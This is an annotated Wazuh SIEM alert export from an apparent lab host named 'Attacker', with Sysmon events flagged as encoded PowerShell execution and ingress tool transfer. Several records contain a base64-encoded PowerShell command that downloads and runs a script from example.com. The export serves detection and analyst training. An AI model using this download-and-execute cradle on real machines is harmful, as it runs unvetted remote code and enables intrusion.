data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bdca-680a-c70b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  16772
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Software protection service scheduled successfully.

🧠 What happened? Software protection service scheduled successfully.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:40:18.055+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:18.055+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Software protection service scheduled successfully.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60642
Numeric ID of the detection rule that fired.

rule.firedtimes:  10
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534418.2025885
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Software Protection Platform Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  16384
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:16.4499482Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2413
Incremental log record number – handy for timeline order.

data.win.system.processID:  11688
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Successfully scheduled Software Protection service for re-start at 2025-04-25T22:31:16Z. Reason: RulesEngine."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.data:  2025-04-25T22:31:16Z, RulesEngine
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:20.450+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:20.450+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  105
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534420.2027467
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:17.7648571Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285865
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:40:16.281 ProcessGuid: {94294ddc-bdd0-680a-cb0b-000000000e00} ProcessId: 17072 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bdcd-680a-c90b-000000000e00} ParentProcessId: 16908 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:16.281
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdd0-680a-cb0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  17072
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bdcd-680a-c90b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  16908
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:20.452+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:20.452+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  109
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534420.2035538
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:17.9638197Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285866
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:40:17.951 ProcessGuid: {94294ddc-bdd0-680a-cb0b-000000000e00} ProcessId: 17072 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_elucagk5.b0x.ps1 CreationUtcTime: 2025-04-24 22:40:17.951 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:17.951
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdd0-680a-cb0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  17072
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_elucagk5.b0x.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:40:17.951
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:23.130+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:23.130+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  106
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534423.2038307
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:20.4605101Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285884
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:40:19.211 ProcessGuid: {94294ddc-bdd3-680a-cd0b-000000000e00} ProcessId: 17212 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bdd0-680a-cb0b-000000000e00} ParentProcessId: 17072 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:19.211
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdd3-680a-cd0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  17212
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bdd0-680a-cb0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  17072
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
